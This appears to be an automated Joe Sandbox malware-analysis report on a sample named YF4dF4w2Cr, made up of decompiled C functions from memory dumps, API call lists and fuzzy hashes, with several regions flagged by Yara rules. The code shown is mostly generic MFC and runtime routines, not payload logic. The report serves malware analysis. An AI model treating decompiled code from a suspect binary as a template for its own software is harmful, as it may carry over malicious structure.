                  								_t109[6] = _t109[6] | _v328.nFileSizeLow;
                  								_t109[7] = 0;
                  								if(E0042DF81( &(_v328.ftCreationTime)) == 0) {
                  									 *_t109 = 0;
                  									_t109[1] = 0;
                  								} else {
                  									_t87 = E0042E0A4( &_v336,  &(_v328.ftCreationTime), _t91);
                  									 *_t109 =  *_t87;
                  									_t109[1] = _t87[1];
                  								}
                  								if(E0042DF81( &(_v328.ftLastAccessTime)) == 0) {
                  									_t109[4] = 0;
                  									_t109[5] = 0;
                  								} else {
                  									_t84 = E0042E0A4( &_v336,  &(_v328.ftLastAccessTime), _t91);
                  									_t109[4] =  *_t84;
                  									_t109[5] = _t84[1];
                  								}
                  								if(E0042DF81( &(_v328.ftLastWriteTime)) == 0) {
                  									_t109[2] = 0;
                  									_t109[3] = 0;
                  								} else {
                  									_t81 = E0042E0A4( &_v336,  &(_v328.ftLastWriteTime), _t91);
                  									_t109[2] =  *_t81;
                  									_t109[3] = _t81[1];
                  								}
                  								if(( *_t109 | _t109[1]) == 0) {
                  									 *_t109 = _t109[2];
                  									_t109[1] = _t109[3];
                  								}
                  								if((_t109[4] | _t109[5]) == 0) {
                  									_t109[4] = _t109[2];
                  									_t109[5] = _t109[3];
                  								}
                  								_t52 = 1;
                  							} else {
                  								goto L7;
                  							}
                  						} else {
                  							 *_t90 = _t54;
                  							L7:
                  							_t52 = 0;
                  						}
                  						_pop(_t89);
                  					}
                  				} else {
                  					L2:
                  					_t52 = 0;
                  				}
                  				_pop(_t106);
                  				_pop(_t110);
                  				return E00430650(_t52, _t89, _v8 ^ _t112, _t103, _t106, _t110);
                  			}






















                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID:
                  • API String ID: 1659193697-0
                  • Opcode ID: fba665bc180cf6534a8231a3261d8d4e4ffe5eeadfc711bd2cc042cdb0669267
                  • Instruction ID: 0a378aa4b9d3e6ad2690f9bed7cbbdce6e48e36b13377e815d177be264a16cbb
                  • Opcode Fuzzy Hash: fba665bc180cf6534a8231a3261d8d4e4ffe5eeadfc711bd2cc042cdb0669267
                  • Instruction Fuzzy Hash: 70511775A00714DFC720DF26E98099BB7F8BF58300B5089AEE49BC3610E734EA44CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424B11(void* __ecx, signed int _a4, intOrPtr _a8) {
                  				void* __ebx;
                  				void* _t12;
                  				signed int _t15;
                  				void* _t20;
                  
                  				_t20 = __ecx;
                  				_t15 = E00412B38(__ecx);
                  				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000100) == 0)) {
                  					L6:
                  					return E004090E8(_t15, _t20, _a4, _a8);
                  				}
                  				_t12 = E004105DA(_t15, _t20, _a4, _a8);
                  				if(_t12 == 0) {
                  					goto L6;
                  				}
                  				return _t12;
                  			}








                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetKeyState.USER32(00000073), ref: 00424B3D
                  • GetKeyState.USER32(00000012), ref: 00424B46
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: State$LongWindow
                  • String ID:
                  • API String ID: 3716621309-0
                  • Opcode ID: a033a21157c47fbfa0e24a96ae4442311d1884c59477a4a71bd33de05f0dab1f
                  • Instruction ID: eb29b69587276a4c87bc497b15f26f710776b5dba471491bf800b7c54aafd883
                  • Opcode Fuzzy Hash: a033a21157c47fbfa0e24a96ae4442311d1884c59477a4a71bd33de05f0dab1f
                  • Instruction Fuzzy Hash: 50F0C23270021A26EF216A66E840FAA6E19DFE0BE4F404037FD0496291DA79EE529658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00409E32(void* __ecx, intOrPtr _a4) {
                  				void* _t4;
                  				intOrPtr _t13;
                  				void* _t15;
                  
                  				_t13 = _a4;
                  				_t15 = __ecx;
                  				if(_t13 == 0xffffffff) {
                  					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
                  						if(IsIconic( *(_t15 + 0x20)) != 0) {
                  							_t13 = 9;
                  						}
                  					} else {
                  						_t13 = 1;
                  					}
                  				}
                  				_t4 = E00408453(_t15, _t13);
                  				if(_t13 == 0xffffffff) {
                  					return _t4;
                  				}
                  				E00412C34(_t15, _t13);
                  				return E00408453(_t15, _t13);
                  			}







                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: IconicVisibleWindow
                  • String ID:
                  • API String ID: 1797901696-0
                  • Opcode ID: 4b89df06aeafc756f6f4c570c949171450a6465a5fa1ccc15aae3332874214a2
                  • Instruction ID: 00d28d6fd906408d5a587392a6d015049f0fc31bbb2550aa14c1424eab5ea1fc
                  • Opcode Fuzzy Hash: 4b89df06aeafc756f6f4c570c949171450a6465a5fa1ccc15aae3332874214a2
                  • Instruction Fuzzy Hash: 89F0823230051027CA20673BDC0891FB66DABD2BB4710423FF56DA22E2BE789C5281D9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,0231F000,02311A84,?,?,?,?,?,?,?,023110F5), ref: 023114F5
                  • RtlAllocateHeap.NTDLL(00000000), ref: 023114FC
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: 03f8a582c78657f137649e45028333436038fcf09cae9b587c140f8526ccd39f
                  • Instruction ID: 49d436cda53e0a06250e8af9f00e2c51b024c7f20af2e47c114c30faee5f407f
                  • Opcode Fuzzy Hash: 03f8a582c78657f137649e45028333436038fcf09cae9b587c140f8526ccd39f
                  • Instruction Fuzzy Hash: 7FA012F0C901005BDD2817F0A90DB093B1CB750301F010848F10186040DE70501C8720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: c26c94d935f1691186dde19e1c6e61457a645a782fba57a7411804cfd9dcd0a3
                  • Instruction ID: 629cc4bb4a741688f9d1c875b3abb57af5c999fd1462042d95355c922d15e293
                  • Opcode Fuzzy Hash: c26c94d935f1691186dde19e1c6e61457a645a782fba57a7411804cfd9dcd0a3
                  • Instruction Fuzzy Hash: F9023170911B608FC77ACF29C680662BBF1BF44A247605EAEC6E786E90D732F445CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0043B152() {
                  
                  				SetUnhandledExceptionFilter(E0043B110);
                  				return 0;
                  			}




                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0003B110), ref: 0043B157
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: d6db74126a095337b5804c22b45782424ac5f1438be7bfbcb22e81afeb1b7e49
                  • Instruction ID: 5b6281a5f520d4fb61d1f782fe85997edca4695b2f4a1162065385c2be311da9
                  • Opcode Fuzzy Hash: d6db74126a095337b5804c22b45782424ac5f1438be7bfbcb22e81afeb1b7e49
                  • Instruction Fuzzy Hash: CF900264651505468F0017725D1E7052694FA5D642F5158B1E221C4196DB944000555A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10b6d93c7cdd72f921876a73e468b75597610690c8c285b60f195085938d1374
                  • Instruction ID: c75495901c9492854ffef2c4eba76b4edb8f28e781fa8d4e775f926aa5259a1c
                  • Opcode Fuzzy Hash: 10b6d93c7cdd72f921876a73e468b75597610690c8c285b60f195085938d1374
                  • Instruction Fuzzy Hash: FB026530521B918FC7B6CF69C680666F7F0BF846247205A6EC6E786EA4D732F845CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: 0c11265734d30500f283200ed9b7eb3c936d71cde1608a088d3186bcf45d338d
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: DED1AF73C0E9B34A8B35852D455813BFA626FE578172ED3E28CE03F38EC26A9D0595D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: c2c71cbb4637e473741d3b1985c8c385a202cdbb69acbbe02834add265deea62
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: BFD18D73C0E9B34A8B35852D466822FFA626FE578072ED3E28CE43F39DD16A5D0185D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: e35bf5eaf1397fb288439c72cfc3b1d36aa2a9c2b85753906dea982f5e48199b
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: 92C19073C0E9B34A8735812D466422BFA626FE579071FD3E28CE43F38E82AA5D0195D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: e6bca40f919b92fc655d71fc7f9890b759ba6e90e5fda41a678eacb09766bcf4
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: 61C18073D0E9B34A8735812D466812FFA626FE578072ED3E28CE43F38ED16A5D0196D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5a04d8b82dc1bdd0ddf315f3a90db5af59d0db8c8b57ad7b7b2e070a8bb893f0
                  • Instruction ID: 2f8572cea4d92692efe4d747c47bdcaa09028def73a60f737bab5e408a06b71f
                  • Opcode Fuzzy Hash: 5a04d8b82dc1bdd0ddf315f3a90db5af59d0db8c8b57ad7b7b2e070a8bb893f0
                  • Instruction Fuzzy Hash: EEA13070910B508FC739CF29C684666BBF5BF44624B505AAEC6E786E90D731F885CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce2a1a0e8d989b7204f3f160ccbc0b184bf6094f11bf8e8c688793db281b5268
                  • Instruction ID: e4b639a7a20d7afbac6cb89b6d93ada0fea79bbc13b64b2b4430ff96ad4e327c
                  • Opcode Fuzzy Hash: ce2a1a0e8d989b7204f3f160ccbc0b184bf6094f11bf8e8c688793db281b5268
                  • Instruction Fuzzy Hash: 78A14230920B918FC7B5CFA9C680667F7F4BF44624B105A6EC6A786AA4D771F885CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: 761dff90568fdbfff66619c32d0fff93acb7ab1a0d5dd79d2a12076d7edbbe89
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: DA31A03661434A8FC750DF58D480A2AF7E4FF88308F4509BDEA958731BD370EA068B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: b43c585d22a56dec82a753d6957df8566bde2504ebc51dec166c93d1aa177f6f
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 25E0E6337215518BD73DDA99C480996F3B9EB84670B290879D6CED7A11C324BC02CE90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: 96bb53f149c027d8138e004b4b6a609a2b3fe45051f28afc174d1e55d096efe9
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 34E08633330511CBC7A0DAD5D880965F3B5EB846707190879D746D3A0AC364BD05D740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d066225cf355ea081255d090b5d8f0af9ab1788191efed86126529aafbb94d05
                  • Instruction ID: c8adc5ccf16261ec5d31fbc12676845fb7cbd01a58cf37860a19b5389e3966a9
                  • Opcode Fuzzy Hash: d066225cf355ea081255d090b5d8f0af9ab1788191efed86126529aafbb94d05
                  • Instruction Fuzzy Hash: 61B092B111A940CBC206DB08D480A44B3E4A708600F10091CE086C3A00C32494008A01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00430191(intOrPtr* __ecx) {
                  				intOrPtr* _t26;
                  
                  				_t26 = __ecx;
                  				 *_t26 = RegisterClipboardFormatA("Native");
                  				 *((intOrPtr*)(_t26 + 4)) = RegisterClipboardFormatA("OwnerLink");
                  				 *((intOrPtr*)(_t26 + 8)) = RegisterClipboardFormatA("ObjectLink");
                  				 *((intOrPtr*)(_t26 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                  				 *((intOrPtr*)(_t26 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                  				 *((intOrPtr*)(_t26 + 0x14)) = RegisterClipboardFormatA("Link Source");
                  				 *((intOrPtr*)(_t26 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                  				 *((intOrPtr*)(_t26 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                  				 *((intOrPtr*)(_t26 + 0x20)) = RegisterClipboardFormatA("FileName");
                  				 *((intOrPtr*)(_t26 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                  				 *((intOrPtr*)(_t26 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                  				 *((intOrPtr*)(_t26 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                  				return _t26;
                  			}





                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 004301A2
                  • RegisterClipboardFormatA.USER32 ref: 004301AB
                  • RegisterClipboardFormatA.USER32 ref: 004301B5
                  • RegisterClipboardFormatA.USER32 ref: 004301BF
                  • RegisterClipboardFormatA.USER32 ref: 004301C9
                  • RegisterClipboardFormatA.USER32 ref: 004301D3
                  • RegisterClipboardFormatA.USER32 ref: 004301DD
                  • RegisterClipboardFormatA.USER32 ref: 004301E7
                  • RegisterClipboardFormatA.USER32 ref: 004301F1
                  • RegisterClipboardFormatA.USER32 ref: 004301FB
                  • RegisterClipboardFormatA.USER32 ref: 00430205
                  • RegisterClipboardFormatA.USER32 ref: 0043020F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                  • API String ID: 1228543026-2889995556
                  • Opcode ID: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction ID: 7eabd4f5f4dbb38bd0e4f7e30e0aa98beb580e07856e0c8e74aebad56863afda
                  • Opcode Fuzzy Hash: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction Fuzzy Hash: 2501E174E41B55B6C7106F729C1D91A7EA1FE447617604927A41C87641DBBCE054CFC8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E0041F7ED(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                  				int _t200;
                  				intOrPtr _t208;
                  				intOrPtr* _t216;
                  				signed char _t224;
                  				signed char _t231;
                  				long _t266;
                  				long _t267;
                  				long _t313;
                  				long _t320;
                  				intOrPtr _t330;
                  				intOrPtr _t388;
                  				intOrPtr _t390;
                  				intOrPtr _t392;
                  				int _t393;
                  				intOrPtr* _t399;
                  				void* _t400;
                  				void* _t403;
                  
                  				_t403 = __eflags;
                  				_t388 = __edx;
                  				E00431A9B(E0044BE41, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t400 - 0x34)) = __ecx;
                  				E00406039(__ebx, _t400 - 0x30, __edx, __edi, __esi, _t403);
                  				_t390 =  *((intOrPtr*)(_t400 + 8));
                  				 *((intOrPtr*)(_t400 - 4)) = 0;
                  				_t399 = E00422D89(0, _t400 - 0x30, _t390, __esi, _t403,  *((intOrPtr*)(_t390 + 0x18)));
                  				 *((intOrPtr*)(_t400 - 0x50)) =  *((intOrPtr*)( *_t399 + 0x1c))(0x44f0f5, 0xac);
                  				E00431160(_t390, _t400 - 0xb8, 0, 0x30);
                  				 *(_t400 - 0xb8) = 0x30;
                  				 *((intOrPtr*)(_t400 - 0xb4)) = 0x40;
                  				 *(_t400 - 0x18) = 0;
                  				if(GetMenuItemInfoA( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8) != 0) {
                  					_t330 = E004014F0(_t400 - 0x30,  *((intOrPtr*)(_t400 - 0x90)));
                  					 *((intOrPtr*)(_t400 - 0x90)) =  *((intOrPtr*)(_t400 - 0x90)) + 1;
                  					 *((intOrPtr*)(_t400 - 0x94)) = _t330;
                  					 *(_t400 - 0x18) = GetMenuItemInfoA( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8);
                  					E0040A356(_t400 - 0x30, 0xffffffff);
                  				}
                  				 *((intOrPtr*)(_t400 - 0x38)) =  *((intOrPtr*)(_t390 + 0x2c));
                  				E00413342(_t400 - 0x78, _t390 + 0x1c);
                  				_t392 =  *((intOrPtr*)(_t400 - 0x38));
                  				if(_t392 == 0 || E0041E99D(_t392, ?str?) == 0) {
                  					 *(_t400 - 0x3c) = 0;
                  					_t393 = GetSystemMetrics(0x32);
                  					_t200 = GetSystemMetrics(0x31);
                  				} else {
                  					 *(_t400 - 0x3c) = 1;
                  					GetObjectA( *(_t392 + 4), 0x18, _t400 - 0x68);
                  					_t393 =  *((intOrPtr*)(_t400 - 0x60));
                  					_t200 =  *(_t400 - 0x64);
                  				}
                  				 *(_t400 - 0x1c) = _t200;
                  				asm("cdq");
                  				asm("cdq");
                  				_t208 = ( *((intOrPtr*)(_t400 - 0x6c)) -  *((intOrPtr*)(_t400 - 0x74)) - _t388 >> 1) - (_t393 - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x74)) - 1;
                  				 *((intOrPtr*)(_t400 - 0x20)) = _t393 + 1 + _t208;
                  				 *((intOrPtr*)(_t400 - 0x28)) = _t208;
                  				 *(_t400 - 0x2c) = 0;
                  				 *((intOrPtr*)(_t400 - 0x24)) =  *(_t400 - 0x1c) + 1;
                  				 *(_t400 - 0x1c) = GetSysColor(4);
                  				E00422859(_t400 - 0x88);
                  				 *((char*)(_t400 - 4)) = 1;
                  				E0040876B(_t400 - 0x88, 0);
                  				 *((intOrPtr*)( *_t399 + 0x28))( *((intOrPtr*)(_t400 - 0x34)) + 8);
                  				_t216 = E0040BD78(_t399, _t400 - 0x14, _t400 - 0x30);
                  				 *((intOrPtr*)(_t400 - 0x40)) =  *((intOrPtr*)(_t216 + 4));
                  				_t218 =  *((intOrPtr*)(_t400 + 8));
                  				 *((intOrPtr*)(_t400 - 0x44)) =  *_t216;
                  				if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000001) == 0) {
